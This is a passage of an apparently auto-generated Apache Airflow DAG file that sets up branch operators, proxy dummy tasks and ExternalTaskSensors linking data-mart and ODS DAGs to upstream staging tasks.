D_DM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG)
def branch_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_SDM_PRD")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE", "D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE", "D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE"]
    return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE"]

my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE,
    dag=D_DM_PRD,
    provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE"
proxy_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_DM_PRD,
)
# Cross-DAG sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE"
D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_SDM_PRD",
    external_task_id="SDM_TESTING_EXPENSE",
    mode="reschedule",
    dag=D_DM_PRD,
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE)
D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE)
def branch_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_SDM_PRD")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE", "D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE", "D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE"]
    return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE"]

my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE,
    dag=D_DM_PRD,
    provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE"
proxy_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_DM_PRD,
)
# Cross-DAG sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE"
D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_SDM_PRD",
    external_task_id="SDM_EQT_EXPENSE",
    mode="reschedule",
    dag=D_DM_PRD,
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE)
D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE)
def branch_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_SDM_PRD")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP", "D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP", "D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP"]
    return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP"]

my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP,
    dag=D_DM_PRD,
    provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP"
proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_DM_PRD,
)
# Cross-DAG sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP"
D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_SDM_PRD",
    external_task_id="SDM_EPR_MFG_SAMPLE_BUILD_EXP",
    mode="reschedule",
    dag=D_DM_PRD,
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP)
D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP)
def branch_D_DM_PRDxD_SDM_PRD__SDM_ITEM(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_SDM_PRD")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ITEM", "D_DM_PRDxD_SDM_PRD__SDM_ITEM"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ITEM", "D_DM_PRDxD_SDM_PRD__SDM_ITEM"]
    return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ITEM"]

my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ITEM"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ITEM = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_ITEM,
    dag=D_DM_PRD,
    provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_ITEM"
proxy_D_DM_PRDxD_SDM_PRD__SDM_ITEM = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_DM_PRD,
)
# Cross-DAG sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_ITEM"
D_DM_PRDxD_SDM_PRD__SDM_ITEM = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_SDM_PRD",
    external_task_id="SDM_ITEM",
    mode="reschedule",
    dag=D_DM_PRD,
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ITEM.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_ITEM)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ITEM.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_ITEM)
D_DM_PRDxD_SDM_PRD__SDM_ITEM.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_ITEM)
def branch_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_SDM_PRD")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY", "D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY", "D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY"]
    return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY"]

my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY,
    dag=D_DM_PRD,
    provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY"
proxy_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_DM_PRD,
)
# Cross-DAG sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY"
D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_SDM_PRD",
    external_task_id="SDM_PLM_CATEGORY",
    mode="reschedule",
    dag=D_DM_PRD,
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY)
D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY)
def branch_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_SDM_PRD")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON", "D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON", "D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON"]
    return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON"]

my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON,
    dag=D_DM_PRD,
    provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON"
proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_DM_PRD,
)
# Cross-DAG sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON"
D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_SDM_PRD",
    external_task_id="SDM_ECN_REASON",
    mode="reschedule",
    dag=D_DM_PRD,
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON)
D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON)
def branch_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_SDM_PRD")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE", "D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE", "D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE"]
    return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE"]

my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE,
    dag=D_DM_PRD,
    provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE"
proxy_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_DM_PRD,
)
# Cross-DAG sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE"
D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_SDM_PRD",
    external_task_id="SDM_PROJECT_CODE",
    mode="reschedule",
    dag=D_DM_PRD,
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE)
D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE)
def branch_D_ODS_CUSxD_STG_INIT__SYS_STS_STG(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_STG_INIT")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG", "D_ODS_CUSxD_STG_INIT__SYS_STS_STG"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG", "D_ODS_CUSxD_STG_INIT__SYS_STS_STG"]
    return ["proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG"]

my_taskid = "BRANCH_D_ODS_CUSxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_CUSxD_STG_INIT__SYS_STS_STG = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_ODS_CUSxD_STG_INIT__SYS_STS_STG,
    dag=D_ODS_CUS,
    provide_context=True,
)
my_taskid = "proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_ODS_CUS,
)
# Cross-DAG sensor
my_taskid = "D_ODS_CUSxD_STG_INIT__SYS_STS_STG"
D_ODS_CUSxD_STG_INIT__SYS_STS_STG = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_STG_INIT",
    external_task_id="SYS_STS_STG",
    mode="reschedule",
    dag=D_ODS_CUS,
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_CUSxD_STG_INIT__SYS_STS_STG)
D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG)
def branch_D_ODS_GBDxD_STG_INIT__SYS_STS_STG(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_STG_INIT")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_ODS_GBDxD_STG_INIT__SYS_STS_STG", "D_ODS_GBDxD_STG_INIT__SYS_STS_STG"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_ODS_GBDxD_STG_INIT__SYS_STS_STG", "D_ODS_GBDxD_STG_INIT__SYS_STS_STG"]
    return ["proxy_D_ODS_GBDxD_STG_INIT__SYS_STS_STG"]

my_taskid = "BRANCH_D_ODS_GBDxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_GBDxD_STG_INIT__SYS_STS_STG = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_ODS_GBDxD_STG_INIT__SYS_STS_STG,
    dag=D_ODS_GBD,
    provide_context=True,
)
my_taskid = "proxy_D_ODS_GBDxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_GBDxD_STG_INIT__SYS_STS_STG = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_ODS_GBD,
)
# Cross-DAG sensor
my_taskid = "D_ODS_GBDxD_STG_INIT__SYS_STS_STG"
D_ODS_GBDxD_STG_INIT__SYS_STS_STG = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_STG_INIT",
    external_task_id="SYS_STS_STG",
    mode="reschedule",
    dag=D_ODS_GBD,
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_D_ODS_GBDxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_GBDxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_GBDxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_GBDxD_STG_INIT__SYS_STS_STG)
D_ODS_GBDxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_GBDxD_STG_INIT__SYS_STS_STG)
def branch_D_ODS_HRMxD_STG_INIT__SYS_STS_STG(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_STG_INIT")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG", "D_ODS_HRMxD_STG_INIT__SYS_STS_STG"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG", "D_ODS_HRMxD_STG_INIT__SYS_STS_STG"]
    return ["proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG"]

my_taskid = "BRANCH_D_ODS_HRMxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_HRMxD_STG_INIT__SYS_STS_STG = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_ODS_HRMxD_STG_INIT__SYS_STS_STG,
    dag=D_ODS_HRM,
    provide_context=True,
)
my_taskid = "proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_ODS_HRM,
)
# Cross-DAG sensor
my_taskid = "D_ODS_HRMxD_STG_INIT__SYS_STS_STG"
D_ODS_HRMxD_STG_INIT__SYS_STS_STG = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_STG_INIT",
    external_task_id="SYS_STS_STG",
    mode="reschedule",
    dag=D_ODS_HRM,
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_HRMxD_STG_INIT__SYS_STS_STG)
D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG)
def branch_D_ODS_MFGxD_STG_INIT__SYS_STS_STG(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_STG_INIT")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG", "D_ODS_MFGxD_STG_INIT__SYS_STS_STG"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG", "D_ODS_MFGxD_STG_INIT__SYS_STS_STG"]
    return ["proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG"]

my_taskid = "BRANCH_D_ODS_MFGxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_MFGxD_STG_INIT__SYS_STS_STG = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_ODS_MFGxD_STG_INIT__SYS_STS_STG,
    dag=D_ODS_MFG,
    provide_context=True,
)
my_taskid = "proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_ODS_MFG,
)
# Cross-DAG sensor
my_taskid = "D_ODS_MFGxD_STG_INIT__SYS_STS_STG"
D_ODS_MFGxD_STG_INIT__SYS_STS_STG = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_STG_INIT",
    external_task_id="SYS_STS_STG",
    mode="reschedule",
    dag=D_ODS_MFG,
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_MFGxD_STG_INIT__SYS_STS_STG)
D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG)
